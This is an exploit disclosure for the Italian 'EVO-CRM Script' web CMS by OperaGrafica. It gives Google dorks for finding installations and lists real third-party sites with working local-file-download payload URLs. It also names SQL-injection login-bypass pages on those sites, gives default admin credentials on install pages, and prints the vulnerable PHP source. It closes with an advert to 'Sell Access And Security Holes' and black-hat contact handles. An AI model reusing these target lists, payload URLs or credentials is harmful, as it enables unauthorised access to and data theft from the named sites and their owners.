/***********************************************************************************
** Exploit Title: EVO-CRM Script Multi Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : http://www.operagrafica.it/
**
** Version: 1.02
**
** Google Dork 1 : intext:"Sito web realizzato da OperaGrafica"
**
** Google Dork 2 : inurl:"contatti.htm" intext:"Dopo aver preso visione"
**
** Date: 2020-03-13
**
** Tested on: Windows/ Mozilla Firefox
**
***********************************************************************************
** Demo Vulnerability LFD :
https://www.tvmoving.it//download.php?nome_file=download.php
http://www.lacollinadelgirasole.it/download.php?nome_file=download.php
http://cafinv.eu/download.php?nome_file=download.php
https://www.frasipercaso.it/download.php?nome_file=download.php
https://www.logistics4you.express/download.php?nome_file=download.php
https://www.scattolini.it/download.php?nome_file=download.php
http://aestetika.it/download.php?nome_file=download.php
http://www.lacollinadelgirasole.it/download.php?nome_file=download.php
***********************************************************************************
***********************************************************************************
** Vulnerability Code Local File Download :
<?php
$nome_file = $_GET['nome_file'];
$dimensione_file = filesize($nome_file);
header("Content-type: Application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($nome_file));
header("Content-Description: Download PHP");
header("Content-Length: $dimensione_file");
readfile($nome_file);
?>
***********************************************************************************
** Demo Vulnerability Bypass Login Page With Method Post To Sql Injection :
https://www.tvmoving.it//riservato/index.php
http://www.lacollinadelgirasole.it/riservato/index.php
http://cafinv.eu/riservato/index.php
https://www.frasipercaso.it/riservato/index.php
https://www.logistics4you.express/riservato/index.php
https://www.scattolini.it/riservato/index.php
http://aestetika.it/riservato/index.php
http://www.lacollinadelgirasole.it/riservato/index.php
***********************************************************************************
***********************************************************************************
** Vulnerability Code Sql Injection :
<?php
define('ACCESS', 'public');
define('RELATIVE_PATH', "../");
require_once(RELATIVE_PATH.'include/application_top.php');
?>
<!DOCTYPE html>
<html lang="en">
<head>
<?php include_once("header_top.php");?>
</head>
<body>
<div id="caricamento" style="height:100%; top:0px;"></div>
<div class="container-fluid">
<div class="row-fluid">
<div class="row-fluid">
<div class="span12 center">
<img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" />
<h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center login-box">
<div class="alert alert-info">
Inserite un utente con credenziali valide per accedere al pannello di amministrazione.
</div>
<form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post">
<fieldset>
<div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input">
<span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" />
</div>
<div class="clearfix"></div>
<div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input">
<span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" />
</div>
<div class="clearfix"></div>
<!-- <div class="input-prepend">
<label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label>
</div>
<div class="clearfix"></div> -->
<input name="loginsubmit" type="hidden" value="Invia" />
<p class="center span5">
<button type="submit" class="btn btn-primary">Login</button>
</p>
</fieldset>
</form>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center">
<p>Password dimenticata? </p>
<a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a>
</div><!--/span-->
</div><!--/row-->
</div><!--/fluid-row-->
<div class="row-fluid">
<div class="span5 center">
<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>
</div><!--/span-->
</div><!--/row-->
</div><!--/.fluid-container-->
<?php include_once("footer_js.php");?>
</body>
</html>
***********************************************************************************
** Demo Vulnerability Default Password :
http://www.lemstrumenti.it/include/install/index.php
https://www.e-volving.it/include/install/index.php
http://www.autmarconi.it/include/install/index.php
Information : Username: admin Password: nimda
***********************************************************************************
** Special thanks to: Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com
***********************************************************************************
